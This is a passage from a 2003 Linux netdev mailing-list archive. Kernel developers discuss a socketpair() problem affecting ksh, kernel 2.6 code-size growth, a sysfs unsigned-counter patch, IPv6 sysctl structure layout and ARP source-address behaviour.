Cc'ed lkml :) Still the netdev folks > > should read it, too. > > Well, we gained some code and a little bit of data, but > the BSS was cut in half which I think deserves noticing :-) > > Also, he should analyze the amount of code that actually > gets executed for various tasks, comparing 2.4.x to 2.5.x > > I'd take a half-meg code size hit if it meant that all > the normal code paths got cut in half :-) half a megabyte more codesize is a lot if you're based on flash. I know you absolutely disliked Andi's patch to make the xfrm subsystem optional so we might need find other ways to make the code smaller on those systems that need it. Now I could talk a lot but I'm really no networking insider so it's hard for me to suggest where to start. I'll rather look at the fs/ issue but it would be nice if networking folks could do their part, too. From davem@redhat.com Wed Jul 23 12:07:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:07:20 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJ7GFl017336 for ; Wed, 23 Jul 2003 12:07:16 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id MAA11290; Wed, 23 Jul 2003 12:04:57 -0700 Date: Wed, 23 Jul 2003 12:04:57 -0700 From: "David S. Miller" To: Glenn Fowler Cc: gsf@research.att.com, dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-Id: <20030723120457.206dc02d.davem@redhat.com> In-Reply-To: <200307231854.OAA90112@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> <200307231814.OAA74344@raptor.research.att.com> <20030723112307.5b8ae55c.davem@redhat.com> <200307231854.OAA90112@raptor.research.att.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4266 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 14:54:49 -0400 (EDT) Glenn Fowler wrote: > On Wed, 23 Jul 2003 11:23:07 -0700 David S. Miller wrote: > > On Wed, 23 Jul 2003 14:14:57 -0400 (EDT) > > Glenn Fowler wrote: > > > > named sockets seem a little heavyweight for this application > > > I think it'll be cheaper than unnamed unix sockets and > > groveling in /proc/*/fd/ > > > And even if there is a minor performance issue, you'll more than get > > that back due to the portability gain. :-) > > named unix sockets reside in the fs namespace, no? Right. > so they must be linked to a dir before use and unlinked after use > the unlink after use would be particularly tricky for the parent process > implementing > cmd <(cmd ...) ... Hmmm... true. I honestly don't know what to suggest you use, sorry :( Is bash totally broken because of all this? Or does the problem only trigger when using (cmd) subprocesses in a certain way? From seanlkml@rogers.com Wed Jul 23 12:10:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:10:38 -0700 (PDT) Received: from fep01-mail.bloor.is.net.cable.rogers.com (fep01-mail.bloor.is.net.cable.rogers.com [66.185.86.71]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJAXFl018103 for ; Wed, 23 Jul 2003 12:10:33 -0700 Received: from lappy7 ([24.102.213.108]) by fep01-mail.bloor.is.net.cable.rogers.com (InterMail vM.5.01.05.12 201-253-122-126-112-20020820) with ESMTP id <20030723190958.TQRO427382.fep01-mail.bloor.is.net.cable.rogers.com@lappy7> for ; Wed, 23 Jul 2003 15:09:58 -0400 Message-ID: <000901c3514e$59697bd0$7f0a0a0a@lappy7> Reply-To: "Sean" From: "Sean" To: Subject: Trivial cosmetic unimportant issue (urgent) Date: Wed, 23 Jul 2003 15:12:24 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1158 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 X-Authentication-Info: Submitted using SMTP AUTH LOGIN at fep01-mail.bloor.is.net.cable.rogers.com from [24.102.213.108] using ID at Wed, 23 Jul 2003 15:09:57 -0400 X-archive-position: 4267 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: seanlkml@rogers.com Precedence: bulk X-list: netdev Hi folks, Just a few days uptime and sysfs is reporting that i've transfered a _negative_ number of bytes! Any chance this could be unsigned output instead? The display is created in a common net_device_stat_show but none of the others values should go negative either. Cheers, Sean From davem@redhat.com Wed Jul 23 12:11:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:11:26 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJBLFl018440 for ; Wed, 23 Jul 2003 12:11:21 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id MAA11304; Wed, 23 Jul 2003 12:09:02 -0700 Date: Wed, 23 Jul 2003 12:09:01 -0700 From: "David S. Miller" To: Christoph Hellwig Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [bernie@develer.com: Kernel 2.6 size increase] Message-Id: <20030723120901.57746fd8.davem@redhat.com> In-Reply-To: <20030723200658.A27856@infradead.org> References: <20030723195355.A27597@infradead.org> <20030723195504.A27656@infradead.org> <20030723115858.75068294.davem@redhat.com> <20030723200658.A27856@infradead.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4268 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 20:06:58 +0100 Christoph Hellwig wrote: > I know you absolutely disliked Andi's patch to make the xfrm subsystem > optional so we might need find other ways to make the code smaller > on those systems that need it. I'm willing to reconsider it. So basically we'd have a CONFIG_NET_XFRM, and things like AH/ESP/IPCOMP/AH6/ESP6/IPCOMP6 would say "select NET_XFRM" in the Kconfig where they are selected. Then when CONFIG_NET_XFRM is not set all the xfrm interfaces called from non-ipsec non-xfrm source files get NOP versions. Is this exactly what Andi's patch did? Just send it on so we can integrate this. We actually lost a lot of code in other areas of the networking, for example Andrew Morton and I made many bogus function inlines undone because they made the code too large. From gsf@research.att.com Wed Jul 23 12:11:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:11:59 -0700 (PDT) Received: from mailman.research.att.com (H-135-207-24-32.research.att.com [135.207.24.32]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJBrFl018677 for ; Wed, 23 Jul 2003 12:11:54 -0700 Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32]) by mailman.research.att.com (8.12.8/8.12.8) with ESMTP id h6NJ3q3j022626; Wed, 23 Jul 2003 15:03:52 -0400 Received: (from gsf@localhost) by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id PAA35164; Wed, 23 Jul 2003 15:11:47 -0400 (EDT) Date: Wed, 23 Jul 2003 15:11:47 -0400 (EDT) From: Glenn Fowler Message-Id: <200307231911.PAA35164@raptor.research.att.com> Organization: AT&T Labs Research X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> <200307231814.OAA74344@raptor.research.att.com> <20030723112307.5b8ae55c.davem@redhat.com> <200307231854.OAA90112@raptor.research.att.com> <20030723120457.206dc02d.davem@redhat.com> To: davem@redhat.com, gsf@research.att.com Subject: Re: kernel bug in socketpair() Cc: dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com X-archive-position: 4269 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gsf@research.att.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 12:04:57 -0700 David S. Miller wrote: > Is bash totally broken because of all this? Or does the problem only > trigger when using (cmd) subprocesses in a certain way? bash uses pipe() so its ok using socketpair() instead of pipe() introduces the problem and we will now have to find an alternative to work around the linux /dev/fd/N implementation thanks From hch@infradead.org Wed Jul 23 12:13:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:13:43 -0700 (PDT) Received: from phoenix.infradead.org (pub234.cambridge.redhat.com [213.86.99.234] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJDcFl019242 for ; Wed, 23 Jul 2003 12:13:39 -0700 Received: from hch by phoenix.infradead.org with local (Exim 4.10) id 19fP3P-0007Hh-00; Wed, 23 Jul 2003 20:13:35 +0100 Date: Wed, 23 Jul 2003 20:13:35 +0100 From: Christoph Hellwig To: "David S. Miller" Cc: Christoph Hellwig , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [bernie@develer.com: Kernel 2.6 size increase] Message-ID: <20030723201335.A27990@infradead.org> Mail-Followup-To: Christoph Hellwig , "David S. Miller" , linux-kernel@vger.kernel.org, netdev@oss.sgi.com References: <20030723195355.A27597@infradead.org> <20030723195504.A27656@infradead.org> <20030723115858.75068294.davem@redhat.com> <20030723200658.A27856@infradead.org> <20030723120901.57746fd8.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20030723120901.57746fd8.davem@redhat.com>; from davem@redhat.com on Wed, Jul 23, 2003 at 12:09:01PM -0700 X-archive-position: 4270 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hch@infradead.org Precedence: bulk X-list: netdev On Wed, Jul 23, 2003 at 12:09:01PM -0700, David S. Miller wrote: > So basically we'd have a CONFIG_NET_XFRM, and things like > AH/ESP/IPCOMP/AH6/ESP6/IPCOMP6 would say "select NET_XFRM" > in the Kconfig where they are selected. > > Then when CONFIG_NET_XFRM is not set all the xfrm interfaces > called from non-ipsec non-xfrm source files get NOP versions. > > Is this exactly what Andi's patch did? Just send it on > so we can integrate this. I think that's what it did modula the select which IIRC wasn't available back then. But I guess I'll rather leave this to Andi. > We actually lost a lot of code in other areas of the networking, for > example Andrew Morton and I made many bogus function inlines > undone because they made the code too large. That's cool! Now we just need to find a bunch more regressions and actually make 2.6 smaller than 2.4 :) Of course that's true for the other subsystems, too. From alan@lxorguk.ukuu.org.uk Wed Jul 23 12:14:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:14:23 -0700 (PDT) Received: from lxorguk.ukuu.org.uk (crosslink-village-512-1.bc.nu [81.2.110.254] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJEHFl019508 for ; Wed, 23 Jul 2003 12:14:18 -0700 Received: from dhcp22.swansea.linux.org.uk (dhcp22.swansea.linux.org.uk [127.0.0.1]) by lxorguk.ukuu.org.uk (8.12.8/8.12.5) with ESMTP id h6NJ9DI5006570; Wed, 23 Jul 2003 20:09:34 +0100 Received: (from alan@localhost) by dhcp22.swansea.linux.org.uk (8.12.8/8.12.8/Submit) id h6NJ8MpK006568; Wed, 23 Jul 2003 20:08:22 +0100 X-Authentication-Warning: dhcp22.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f Subject: Re: kernel bug in socketpair() From: Alan Cox To: Glenn Fowler Cc: davem@redhat.com, dgk@research.att.com, Linux Kernel Mailing List , netdev@oss.sgi.com In-Reply-To: <200307231854.OAA90112@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> <200307231814.OAA74344@raptor.research.att.com> <20030723112307.5b8ae55c.davem@redhat.com> <200307231854.OAA90112@raptor.research.att.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit Organization: Message-Id: <1058987301.5520.111.camel@dhcp22.swansea.linux.org.uk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 (1.2.2-5) Date: 23 Jul 2003 20:08:21 +0100 X-archive-position: 4271 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@lxorguk.ukuu.org.uk Precedence: bulk X-list: netdev On Mer, 2003-07-23 at 19:54, Glenn Fowler wrote: > named unix sockets reside in the fs namespace, no? > so they must be linked to a dir before use and unlinked after use > the unlink after use would be particularly tricky for the parent process > implementing > cmd <(cmd ...) ... Portable stuff yes, Linux also supports a pure socket namespace for them when the path starts with a nul character From davem@redhat.com Wed Jul 23 12:16:56 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:16:59 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJGuFl020450 for ; Wed, 23 Jul 2003 12:16:56 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id MAA11360; Wed, 23 Jul 2003 12:14:37 -0700 Date: Wed, 23 Jul 2003 12:14:36 -0700 From: "David S. Miller" To: Glenn Fowler Cc: gsf@research.att.com, dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-Id: <20030723121436.10d53965.davem@redhat.com> In-Reply-To: <200307231911.PAA35164@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> <200307231814.OAA74344@raptor.research.att.com> <20030723112307.5b8ae55c.davem@redhat.com> <200307231854.OAA90112@raptor.research.att.com> <20030723120457.206dc02d.davem@redhat.com> <200307231911.PAA35164@raptor.research.att.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4272 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 15:11:47 -0400 (EDT) Glenn Fowler wrote: > On Wed, 23 Jul 2003 12:04:57 -0700 David S. Miller wrote: > > Is bash totally broken because of all this? Or does the problem only > > trigger when using (cmd) subprocesses in a certain way? > > bash uses pipe() so its ok > using socketpair() instead of pipe() introduces the problem > and we will now have to find an alternative to work around the > linux /dev/fd/N implementation I missed the reason why you can't use pipes and bash is able to, what is it? If it's the fchown() thing, why doesn't bash have this issue? From gsf@research.att.com Wed Jul 23 12:29:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:29:12 -0700 (PDT) Received: from linux.research.att.com (H-135-207-24-16.research.att.com [135.207.24.16]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJT8Fl021391 for ; Wed, 23 Jul 2003 12:29:09 -0700 Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32]) by linux.research.att.com (8.12.8/8.12.8) with ESMTP id h6NJkDJh029434; Wed, 23 Jul 2003 15:46:13 -0400 Received: (from gsf@localhost) by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id PAA77754; Wed, 23 Jul 2003 15:29:03 -0400 (EDT) Date: Wed, 23 Jul 2003 15:29:03 -0400 (EDT) From: Glenn Fowler Message-Id: <200307231929.PAA77754@raptor.research.att.com> Organization: AT&T Labs Research X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> <200307231814.OAA74344@raptor.research.att.com> <20030723112307.5b8ae55c.davem@redhat.com> <200307231854.OAA90112@raptor.research.att.com> <20030723120457.206dc02d.davem@redhat.com> <200307231911.PAA35164@raptor.research.att.com> <20030723121436.10d53965.davem@redhat.com> To: davem@redhat.com, gsf@research.att.com Subject: Re: kernel bug in socketpair() Cc: dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com X-archive-position: 4274 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gsf@research.att.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 12:14:36 -0700 David S. Miller wrote: > I missed the reason why you can't use pipes and bash > is able to, what is it? we have some applications, ksh included, with semantics that require stdin be read at most one line at a time; an inefficient implementation of this does 1 byte read()s until newline is read; an efficient implementation does a peek read (without advancing the read/seek offset), determines how many chars to read up to and including the newline, and then read()s that much linux has ioctl(I_PEEK) for stream devices and recv() for sockets, and neither of these work on pipes; if there is a linux alternative for pipes then we'd be glad to use it we switched from pipe() to socketpair() to take advantage of the linux recv() peek read From dgk@research.att.com Wed Jul 23 12:28:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:29:04 -0700 (PDT) Received: from mailman.research.att.com (H-135-207-24-32.research.att.com [135.207.24.32]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJSwFl021371 for ; Wed, 23 Jul 2003 12:28:59 -0700 Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32]) by mailman.research.att.com (8.12.8/8.12.8) with ESMTP id h6NJKv3j022959; Wed, 23 Jul 2003 15:20:57 -0400 Received: (from dgk@localhost) by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id PAA75996; Wed, 23 Jul 2003 15:28:52 -0400 (EDT) Date: Wed, 23 Jul 2003 15:28:52 -0400 (EDT) From: David Korn Message-Id: <200307231928.PAA75996@raptor.research.att.com> X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: davem@redhat.com, dgk@research.att.com, gsf@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Re: kernel bug in socketpair() X-archive-position: 4273 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: dgk@research.att.com Precedence: bulk X-list: netdev cc: gsf@research.att.com dgk@research.att.com linux-kernel@vger.kernel.org netdev@oss.sgi.com Subject: Re: Re: kernel bug in socketpair() -------- > I missed the reason why you can't use pipes and bash > is able to, what is it? > > If it's the fchown() thing, why doesn't bash have this issue? > > The reason is that we want to be able to peek ahead at data in the pipe before advancing. You can do this with recv() but this doesn't work wtih pipes. On some systems you can use an ioctl() for this with pipes by Linux doesn't support this so ksh configures to use socketpair() instead of pipe() on Linux. Without the ability to peek ahead on pipes, a command like cat file | { head -6 > /dev/null; cat ;} to remove the first 6 lines of a file would be hard to implement unless head reads one byte at a time from the pipe. (OK, you could read 6 bytes at first if you want to optimize head.) David Korn dgk@research.att.com From davem@redhat.com Wed Jul 23 12:58:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:58:55 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJwjFl023664 for ; Wed, 23 Jul 2003 12:58:45 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id MAA11481; Wed, 23 Jul 2003 12:56:26 -0700 Date: Wed, 23 Jul 2003 12:56:25 -0700 From: "David S. Miller" To: Glenn Fowler Cc: gsf@research.att.com, dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-Id: <20030723125625.77eda939.davem@redhat.com> In-Reply-To: <200307231929.PAA77754@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> <200307231814.OAA74344@raptor.research.att.com> <20030723112307.5b8ae55c.davem@redhat.com> <200307231854.OAA90112@raptor.research.att.com> <20030723120457.206dc02d.davem@redhat.com> <200307231911.PAA35164@raptor.research.att.com> <20030723121436.10d53965.davem@redhat.com> <200307231929.PAA77754@raptor.research.att.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4275 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 15:29:03 -0400 (EDT) Glenn Fowler wrote: > linux has ioctl(I_PEEK) for stream devices and recv() for sockets, > and neither of these work on pipes; if there is a linux alternative > for pipes then we'd be glad to use it Alan mentioned the pure-socket namespace we have for named unix sockets, but I don't think you can actually use it for your problem unfortunately. From davem@redhat.com Wed Jul 23 13:21:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 13:21:58 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NKLlFl025359 for ; Wed, 23 Jul 2003 13:21:48 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id NAA11569; Wed, 23 Jul 2003 13:19:29 -0700 Date: Wed, 23 Jul 2003 13:19:28 -0700 From: "David S. Miller" To: "Sean" Cc: netdev@oss.sgi.com Subject: Re: Trivial cosmetic unimportant issue (urgent) Message-Id: <20030723131928.324b1632.davem@redhat.com> In-Reply-To: <000901c3514e$59697bd0$7f0a0a0a@lappy7> References: <000901c3514e$59697bd0$7f0a0a0a@lappy7> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4276 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 15:12:24 -0400 "Sean" wrote: > Just a few days uptime and sysfs is reporting that i've transfered a _negative_ number of bytes! Any chance this could be > unsigned output instead? The display is created in a common net_device_stat_show but none of the others values should go negative > either. This should fix it. --- net/core/net-sysfs.c.~1~ Wed Jul 23 12:20:15 2003 +++ net/core/net-sysfs.c Wed Jul 23 12:20:24 2003 @@ -186,7 +186,7 @@ static ssize_t net_device_stat_show(unsigned long var, char *buf) { - return sprintf(buf, "%ld\n", var); + return sprintf(buf, "%lu\n", var); } /* generate a read-only statistics attribute */ From krkumar@us.ibm.com Wed Jul 23 15:34:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 15:35:11 -0700 (PDT) Received: from e6.ny.us.ibm.com (e6.ny.us.ibm.com [32.97.182.106]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NMXlFl002421 for ; Wed, 23 Jul 2003 15:34:34 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e6.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6NMWrkh143790; Wed, 23 Jul 2003 18:32:53 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6NMWooc122290; Wed, 23 Jul 2003 18:32:51 -0400 Message-ID: <3F1F0CF7.5020909@us.ibm.com> Date: Wed, 23 Jul 2003 15:32:23 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: kuznet@ms2.inr.ac.ru, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: O/M flags against 2.6.0-test1 References: <200307210155.FAA31320@dub.inr.ac.ru> <20030723031351.4e9db07c.davem@redhat.com> In-Reply-To: <20030723031351.4e9db07c.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4277 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev Hi Dave, > 1) Remove "void *sysctl;" from ipv6_devconf, move it into > inet6_dev ie. "void *cnf_sysctl;" update all code users. There is one problem with this that I am not able to figure out, perhaps I am overlooking it. addrconf_sysctl_register() gets called for ipv6_devconf_dflt, but there is no inet6_dev for this configuration, so is it possible to move the sysctl up (there is no 'up' :-). I don't want to create a dummy inet6_dev for this. One way is to embed the actual config structure as follows : struct ipv6_devconf { void *sysctl; struct { forwarding; hop_limit; ... } u; }; and follow it up with #defines for all the elements, etc. Then I can use sizeof(ipv6_devconf.u) without this problem. Another way to do this is using pointer arithmetic : RTA_PUT(skb, IFLA_INET6_CONF, &idev->cnf.sysctl-&idev->cnf.forwarding, &idev->cnf); (guess you may not like it based on your statement "pointers in it which makes usage sloppy"). I also noticed there is no sysctl_register for ipv6_devconf, but there is a unregister for that conf. Is that correct ? > 2) Move "struct ipv6_devconf" into some linux/*.h ipv6 header > usable by users. Use an existing one if possible. Then > make sure net/if_inet6.h includes this thing. The only two ipv6 specific files in linux are ipv6.h and ipv6_route.h, neither are appropriate for sysctl stuff I think. So should I create a new file like the one for ipv4_devconf exists in inetdevice.h ? > 3) Change "int" members of struct "ipv6_devconf" to "s32". All members (except use_tempaddr) seem to be >=0, should I change the definition to __u32 instead ? I am OK either way, just wondering which is the right way to do this. Thanks, - KK From ja@ssi.bg Wed Jul 23 16:08:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 16:09:11 -0700 (PDT) Received: from u.domain.uli (ja.mac.ssi.bg [217.79.71.194]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NN8XFl004509 for ; Wed, 23 Jul 2003 16:08:35 -0700 Received: from localhost (IDENT:ja@localhost [127.0.0.1]) by u.domain.uli (8.11.6/8.11.6) with ESMTP id h6NN1kN01430; Thu, 24 Jul 2003 02:01:46 +0300 Date: Thu, 24 Jul 2003 02:01:46 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@u.domain.uli To: Carlos Velasco cc: netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address In-Reply-To: <200307231712000985.1CE20A63@192.168.128.16> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4278 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev Hello, On Wed, 23 Jul 2003, Carlos Velasco wrote: > When linux machine tries to find out the mac address of 192.168.128.60 with > ARP, it uses the loopback IP address (lo:2) as source insted of the IP address > of the ethernet interface (eth0). You are right but the kernel tries to preserve the sender's IP. This helps the receiver to select the best interface to answer this ARP probe - the same where the IP packet will be accepted later. As there are different setups, the tuning of the ARP handling can be done better with user tools such as arptables and iparp. http://sourceforge.net/projects/ebtables/ http://www.ssi.bg/~ja/#iparp > Regards, > Carlos Velasco Regards -- Julian Anastasov From rugolsky@telemetry-investments.com Wed Jul 23 16:27:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 16:28:33 -0700 (PDT) Received: from ti3.telemetry-investments.com (209-166-240-202.cust.walrus.com [209.166.240.202]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NNRHFl006277 for ; Wed, 23 Jul 2003 16:27:58 -0700 Received: from ti21.telemetry-investments.com (ti21 [192.168.8.21]) by ti3.telemetry-investments.com (8.11.6/8.11.6) with ESMTP id h6NNRB012933; Wed, 23 Jul 2003 19:27:11 -0400 Received: (from rugolsky@localhost) by 